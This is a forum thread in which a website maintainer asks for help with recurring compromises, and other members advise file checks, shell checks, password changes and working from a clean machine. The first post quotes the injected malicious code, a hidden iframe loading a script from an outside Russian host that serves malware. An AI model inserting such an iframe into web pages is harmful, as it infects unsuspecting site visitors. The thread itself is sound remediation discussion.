Malware Related > Compromised Servers

Very Frustrated...Websites Compromised

(1/6) > >>

#41baby:
Hello,

I have been having problems with several websites I design/maintain.  We thought the issue was dealt with 3 months ago but it keeps coming back.  The following appears in any page named INDEX:


--- Code: ---<iframe src="h[i]tt[/i]p://a3h.ru:8080/ts/in.cgi?pepsi82" width=125 height=125 style="visibility: hidden"></iframe>
--- End code ---

It causes a virus to be downloaded.

I have done everything the internet has suggested:  malware scans, virus scans, updating all my programs and I just requested new passwords for each server (I should have it by Monday).  I woke up this morning and the sites were again nailed with the virus.

I read on this list, it could have something to do with PHP code.  Could it be my form code?  I have one PHP and one that is flash with PHP that I got off the net.

If anyone here can help me out, that would be greatly appreciated.

After I get my password change (and I removed the FTP program's storage of the information), what should I do?

Thanks,

DN

MysteryFCM: Embedded HTML in BBCode tags

MysteryFCM:
Theres 4 main things you need to do;

1. Check your sites files (ALL of the files) for malicious code
2. Check no shells were uploaded
3. Change the FTP passwords
4. Change any web based passwords for the site

This should ALL be done from a known clean machine (i.e. not the machine you usually use).

If you've got a backup of the sites files, you can skip #1, and just delete ALL of the files currently on the server, and replace them with the backups.

If your site uses a database, this will need to be checked aswell.

#41baby:
Hello,

Thanks for the reply.

Questions from your answers:

1. Check your sites files (ALL of the files) for malicious code:  the code keeps appearing and re-appearing.  What I usually do is delete it from the server and upload the one from my computer which does not have it.  Then, after 2 months (or in this case a couple days lately), it reappears.  They only seem to attach the INDEX.HTML pages.    

2. Check no shells were uploaded:  I have no idea what you mean by this.  Can you tell me how to check for "shells".

3. Change the FTP passwords:  In the works.

4. Change any web based passwords for the site:  I do have any.

5.  This should ALL be done from a known clean machine (i.e. not the machine you usually use). If you've got a backup of the sites files, you can skip #1, and just delete ALL of the files currently on the server, and replace them with the backups:  This is always the part I get really confused.  The website files from my computer are always clean.  They get infected once I put them online.  I have checked them many times and they are clean.  So, I just have to burn them to a disk, bring them to say, my lap-top (which I never used for uploading to the server before) and upload them?

6. If your site uses a database:  I just have a basic package from www.namesecure.com.  Not sure if it has a database.  I do not think so.

Thanks for your answers and I look forward to clarifying what you already said.

DN

CM_MWR:
These frames were/are being inserted via compromised FTP last I heard, be sure the machine your using to make changes from isnt compromised as well, Ive found that to be the case more than once.

#41baby:
Hello,

These frames were/are being inserted via compromised FTP last I heard, be sure the machine your using to make changes from isnt compromised as well, Ive found that to be the case more than once.

Two (more) Questions:

1 - Any suggestions for checking my computer.  I have done SEVERAL different scans and methods.  Any suggestions would be appreciated.  Perhaps I missed something.   

2 - In terms of using another computer to upload:  so I can never use my actually computer again?  What if I need to change something on my website?  My lap-top does not have the programs. 

Thanks,

DN

Navigation

[0] Message Index

[#] Next page

Go to full version